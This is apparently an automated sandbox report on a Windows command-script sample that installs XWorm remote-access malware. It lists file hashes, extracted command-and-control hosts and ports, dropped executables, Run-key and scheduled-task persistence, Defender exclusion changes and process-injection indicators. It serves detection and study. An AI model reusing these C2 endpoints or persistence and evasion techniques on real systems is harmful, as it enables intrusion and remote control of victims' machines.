Analysis
max time kernel: 145s
max time network: 153s
platform: windows11-21h2_x64
resource: win11-20240611-en
resource tags: arch:x64, arch:x86, image:win11-20240611-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 21-06-2024 17:07
Static task: static1
General
Target: Virus.cmd
Size: 42B
MD5: 48f5300898b4a69d81bb0b0745fe364c
SHA1: 5835f2af2608919f359e3eccb24c54cf6bdec3fe
SHA256: d90f45a296a620f69256791f49a794451c83192cd8244600c3e26c5cd0e16e94
SHA512: 7ec1cbbd93fb02444050124ea4cf5a382f6732916cc89aa6f6263e7d8d5cf4034da75f02bca9d7b43fa1bcb11ccfe7381a856c96cae416fb1b3bd03f626694f1
Malware Config
Extracted: xworm
  147.185.221.18:41012
  Install_directory: %Userprofile%
  install_file: USBhelper.exe
Extracted: xworm 3.1
  seems-radio.gl.at.ply.gg:2519
  adult-purchased.gl.at.ply.gg:13795
  Install_directory: %ProgramData%
  install_file: USB.exe
Signatures
Detect Xworm Payload 5 IoCs
Processes:
resource | yara_rule
C:\ProgramData\x4V5.2.exe | family_xworm
behavioral1/memory/1540-100-0x0000000000660000-0x000000000067C000-memory.dmp | family_xworm
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe | family_xworm
behavioral1/memory/3672-1154-0x0000000000DB0000-0x0000000000DCA000-memory.dmp | family_xworm
behavioral1/memory/1540-1935-0x000000001B490000-0x000000001B49E000-memory.dmp | family_xworm
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
description | pid | process | target process
PID 2496 created 640 | 2496 | powershell.EXE | winlogon.exe
PID 1616 created 640 | 1616 | powershell.EXE | winlogon.exe
Blocklisted process makes network request 4 IoCs
Processes:
flow | pid | process
3 | 1940 | powershell.exe
4 | 1940 | powershell.exe
5 | 1940 | powershell.exe
6 | 1940 | powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 17 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
pid | process
4420 | powershell.exe
1812 | powershell.exe
4908 | powershell.exe
1692 | powershell.exe
4880 | powershell.exe
1876 | powershell.exe
3664 | powershell.exe
424 | powershell.exe
408 | powershell.exe
1376 | powershell.exe
4116 | powershell.exe
2196 | powershell.exe
1568 | powershell.exe
2424 | powershell.exe
2268 | powershell.exe
5004 | powershell.exe
1576 | powershell.exe
Downloads MZ/PE file
Sets file to hidden 1 TTPs 3 IoCs
Modifies file attributes to stop it showing in Explorer etc.
Processes:
pid | process
3112 | attrib.exe
4376 | attrib.exe
1832 | attrib.exe
Drops startup file 6 IoCs
Processes:
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe | drivermapperJoex.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Malicious.exe | drivermapperJoex.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Malicious.lnk | x4V5.2.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Malicious.lnk | x4V5.2.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.lnk | x4Joex1.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.lnk | x4Joex1.exe
Executes dropped EXE 14 IoCs
Processes:
pid | process
2076 | DriverLocator.exe
4752 | SMAtMZpm.exe
4480 | Drivermapper.exe
1540 | x4V5.2.exe
3052 | x4Shellcode.exe
3632 | DriverLocator.exe
2480 | drivermapperJoex.exe
2080 | CgDFtNWD.exe
3672 | x4Joex1.exe
4672 | Malicious.exe
4884 | x4V5.2.exe
4972 | x4Shellcode.exe
544 | x4Malicious
1044 | x4Malicious
Adds Run key to start application 2 TTPs 8 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4Joex1 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\x4Joex1.exe" | drivermapperJoex.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\Malicious = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Malicious.exe" | drivermapperJoex.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4Malicious = "C:\\Users\\Admin\\x4Malicious" | x4V5.2.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4V5.2 = "C:\\ProgramData\\x4V5.2.exe" | Malicious.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4Shellcode = "C:\\ProgramData\\x4Shellcode.exe" | Malicious.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4Joex1 = "C:\\ProgramData\\x4Joex1.exe" | x4Joex1.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4V5.2 = "C:\\ProgramData\\x4V5.2.exe" | Drivermapper.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4Shellcode = "C:\\ProgramData\\x4Shellcode.exe" | Drivermapper.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
1 | icanhazip.com
1 | ip-api.com
Drops file in System32 directory 20 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | OfficeClickToRun.exe
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Inventory.evtx | svchost.exe
File opened for modification | C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe | attrib.exe
File opened for modification | C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe | attrib.exe
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | svchost.exe
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Steps-Recorder.evtx | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\x4Joex1 | svchost.exe
File opened for modification | C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe | attrib.exe
File opened for modification | C:\Windows\System32\Tasks\x4Malicious | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\x4svc64 | svchost.exe
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx | svchost.exe
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Troubleshooter.evtx | svchost.exe
File created | C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe | curl.exe
File created | C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe | curl.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File created | C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe | curl.exe
File opened for modification | C:\Windows\System32\Tasks\Malicious | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
Suspicious use of SetThreadContext 2 IoCs
Processes:
description | pid | process | target process
PID 2496 set thread context of 1100 | 2496 | powershell.EXE | dllhost.exe
PID 1616 set thread context of 2080 | 1616 | powershell.EXE | dllhost.exe
Drops file in Windows directory 8 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\Panther\UnattendGC\diagerr.xml | SystemSettings.exe
File opened for modification | C:\Windows\Panther\UnattendGC\diagwrn.xml | SystemSettings.exe
File opened for modification | C:\Windows\Panther\UnattendGC\setupact.log | UserOOBEBroker.exe
File opened for modification | C:\Windows\Panther\UnattendGC\setuperr.log | UserOOBEBroker.exe
File opened for modification | C:\Windows\Panther\UnattendGC\diagerr.xml | UserOOBEBroker.exe
File opened for modification | C:\Windows\Panther\UnattendGC\diagwrn.xml | UserOOBEBroker.exe
File opened for modification | C:\Windows\Panther\UnattendGC\setupact.log | SystemSettings.exe
File opened for modification | C:\Windows\Panther\UnattendGC\setuperr.log | SystemSettings.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Checks SCSI registry key(s) 3 TTPs 8 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID | SystemSettings.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | SystemSettings.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | SystemSettings.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | SystemSettings.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | SystemSettings.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | SystemSettings.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID | SystemSettings.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | SystemSettings.exe
Delays execution with timeout.exe 2 IoCs
Processes:
pid | process
2560 | timeout.exe
4668 | timeout.exe
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | wmiprvse.exe
Modifies data under HKEY_USERS 64 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1718989760" | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.EXE
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.EXE
Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.EXE
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Fri, 21 Jun 2024 17:09:21 GMT" | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | OfficeClickToRun.exe
Modifies registry class 7 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\PersistedTitleBarData | ApplicationFrameHost.exe
Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\PersistedTitleBarData\windows.immersivecontrolpanel_cw5n1h2txye | ApplicationFrameHost.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\PersistedTitleBarData\windows.immersivecontrolpanel_cw5n1h2txye = "2814749767500776" | ApplicationFrameHost.exe
Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings | powershell.exe
Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\SplashScreen | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame\windows.immersivecontrolpanel_cw5n1h2txyewy!mi | Explorer.EXE
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid | process
4936 | schtasks.exe
3112 | schtasks.exe
1440 | schtasks.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid | process
1940 | powershell.exe
1940 | powershell.exe
1576 | powershell.exe
1576 | powershell.exe
3664 | powershell.exe
3664 | powershell.exe
1692 | powershell.exe
1692 | powershell.exe
424 | powershell.exe
424 | powershell.exe
2076 | DriverLocator.exe
2076 | DriverLocator.exe
2076 | DriverLocator.exe
2076 | DriverLocator.exe
4752 | SMAtMZpm.exe
4752 | SMAtMZpm.exe
4752 | SMAtMZpm.exe
4752 | SMAtMZpm.exe
4420 | powershell.exe
4420 | powershell.exe
408 | powershell.exe
408 | powershell.exe
2496 | powershell.EXE
2496 | powershell.EXE
2496 | powershell.EXE
1100 | dllhost.exe
1100 | dllhost.exe
1100 | dllhost.exe
1100 | dllhost.exe
1100 | dllhost.exe
1100 | dllhost.exe
1100 | dllhost.exe
1100 | dllhost.exe
1100 | dllhost.exe
1100 | dllhost.exe
1100 | dllhost.exe
1100 | dllhost.exe
1100 | dllhost.exe
1100 | dllhost.exe
3632 | DriverLocator.exe
3632 | DriverLocator.exe
3632 | DriverLocator.exe
3632 | DriverLocator.exe
1100 | dllhost.exe
1100 | dllhost.exe
2080 | CgDFtNWD.exe
2080 | CgDFtNWD.exe
2080 | CgDFtNWD.exe
2080 | CgDFtNWD.exe
5096 | wmiprvse.exe
5096 | wmiprvse.exe
5096 | wmiprvse.exe
5096 | wmiprvse.exe
5096 | wmiprvse.exe
5096 | wmiprvse.exe
1376 | powershell.exe
1376 | powershell.exe
4116 | powershell.exe
4116 | powershell.exe
2424 | powershell.exe
2424 | powershell.exe
2196 | powershell.exe
2196 | powershell.exe
1812 | powershell.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 1940 | powershell.exe
Token: SeDebugPrivilege | 1576 | powershell.exe
Token: SeDebugPrivilege | 3664 | powershell.exe
Token: SeDebugPrivilege | 1692 | powershell.exe
Token: SeDebugPrivilege | 424 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 3028 | WMIC.exe
Token: SeSecurityPrivilege | 3028 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 3028 | WMIC.exe
Token: SeLoadDriverPrivilege | 3028 | WMIC.exe
Token: SeSystemProfilePrivilege | 3028 | WMIC.exe
Token: SeSystemtimePrivilege | 3028 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 3028 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 3028 | WMIC.exe
Token: SeCreatePagefilePrivilege | 3028 | WMIC.exe
Token: SeBackupPrivilege | 3028 | WMIC.exe
Token: SeRestorePrivilege | 3028 | WMIC.exe
Token: SeShutdownPrivilege | 3028 | WMIC.exe
Token: SeDebugPrivilege | 3028 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 3028 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 3028 | WMIC.exe
Token: SeUndockPrivilege | 3028 | WMIC.exe
Token: SeManageVolumePrivilege | 3028 | WMIC.exe
Token: 33 | 3028 | WMIC.exe
Token: 34 | 3028 | WMIC.exe
Token: 35 | 3028 | WMIC.exe
Token: 36 | 3028 | WMIC.exe
Token: SeIncreaseQuotaPrivilege | 3028 | WMIC.exe
Token: SeSecurityPrivilege | 3028 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 3028 | WMIC.exe
Token: SeLoadDriverPrivilege | 3028 | WMIC.exe
Token: SeSystemProfilePrivilege | 3028 | WMIC.exe
Token: SeSystemtimePrivilege | 3028 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 3028 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 3028 | WMIC.exe
Token: SeCreatePagefilePrivilege | 3028 | WMIC.exe
Token: SeBackupPrivilege | 3028 | WMIC.exe
Token: SeRestorePrivilege | 3028 | WMIC.exe
Token: SeShutdownPrivilege | 3028 | WMIC.exe
Token: SeDebugPrivilege | 3028 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 3028 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 3028 | WMIC.exe
Token: SeUndockPrivilege | 3028 | WMIC.exe
Token: SeManageVolumePrivilege | 3028 | WMIC.exe
Token: 33 | 3028 | WMIC.exe
Token: 34 | 3028 | WMIC.exe
Token: 35 | 3028 | WMIC.exe
Token: 36 | 3028 | WMIC.exe
Token: SeDebugPrivilege | 2076 | DriverLocator.exe
Token: SeDebugPrivilege | 4752 | SMAtMZpm.exe
Token: SeDebugPrivilege | 4420 | powershell.exe
Token: SeDebugPrivilege | 1540 | x4V5.2.exe
Token: SeDebugPrivilege | 408 | powershell.exe
Token: SeDebugPrivilege | 2496 | powershell.EXE
Token: SeDebugPrivilege | 2496 | powershell.EXE
Token: SeDebugPrivilege | 1100 | dllhost.exe
Token: SeDebugPrivilege | 3632 | DriverLocator.exe
Token: SeDebugPrivilege | 2080 | CgDFtNWD.exe
Token: SeShutdownPrivilege | 3216 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3216 | Explorer.EXE
Token: SeAssignPrimaryTokenPrivilege | 2832 | svchost.exe
Token: SeIncreaseQuotaPrivilege | 2832 | svchost.exe
Token: SeSecurityPrivilege | 2832 | svchost.exe
Token: SeTakeOwnershipPrivilege | 2832 | svchost.exe
Token: SeLoadDriverPrivilege | 2832 | svchost.exe
Suspicious use of FindShellTrayWindow 5 IoCs
Processes:
pid | process
3216 | Explorer.EXE
3216 | Explorer.EXE
3216 | Explorer.EXE
3216 | Explorer.EXE
3724 | ApplicationFrameHost.exe
Suspicious use of SendNotifyMessage 7 IoCs
Processes:
pid | process
3216 | Explorer.EXE
3216 | Explorer.EXE
3216 | Explorer.EXE
3216 | Explorer.EXE
3216 | Explorer.EXE
3216 | Explorer.EXE
3216 | Explorer.EXE
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
pid | process
1540 | x4V5.2.exe
3672 | x4Joex1.exe
3216 | Explorer.EXE
3148 | SystemSettings.exe
Suspicious use of UnmapMainImage 2 IoCs
Processes:
pid | process
3216 | Explorer.EXE
3876 | RuntimeBroker.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description | pid | process | target process
PID 4572 wrote to memory of 1940 | 4572 | cmd.exe | powershell.exe
PID 4572 wrote to memory of 1940 | 4572 | cmd.exe | powershell.exe
PID 1940 wrote to memory of 1444 | 1940 | powershell.exe | cmd.exe
PID 1940 wrote to memory of 1444 | 1940 | powershell.exe | cmd.exe
PID 1940 wrote to memory of 2900 | 1940 | powershell.exe | cmd.exe
PID 1940 wrote to memory of 2900 | 1940 | powershell.exe | cmd.exe
PID 2900 wrote to memory of 1576 | 2900 | cmd.exe | powershell.exe
PID 2900 wrote to memory of 1576 | 2900 | cmd.exe | powershell.exe
PID 2900 wrote to memory of 3328 | 2900 | cmd.exe | cmd.exe
PID 2900 wrote to memory of 3328 | 2900 | cmd.exe | cmd.exe
PID 3328 wrote to memory of 1224 | 3328 | cmd.exe | mountvol.exe
PID 3328 wrote to memory of 1224 | 3328 | cmd.exe | mountvol.exe
PID 3328 wrote to memory of 3240 | 3328 | cmd.exe | find.exe
PID 3328 wrote to memory of 3240 | 3328 | cmd.exe | find.exe
PID 2900 wrote to memory of 3664 | 2900 | cmd.exe | powershell.exe
PID 2900 wrote to memory of 3664 | 2900 | cmd.exe | powershell.exe
PID 2900 wrote to memory of 1692 | 2900 | cmd.exe | powershell.exe
PID 2900 wrote to memory of 1692 | 2900 | cmd.exe | powershell.exe
PID 2900 wrote to memory of 424 | 2900 | cmd.exe | powershell.exe
PID 2900 wrote to memory of 424 | 2900 | cmd.exe | powershell.exe
PID 2900 wrote to memory of 4128 | 2900 | cmd.exe | cmd.exe
PID 2900 wrote to memory of 4128 | 2900 | cmd.exe | cmd.exe
PID 4128 wrote to memory of 3028 | 4128 | cmd.exe | WMIC.exe
PID 4128 wrote to memory of 3028 | 4128 | cmd.exe | WMIC.exe
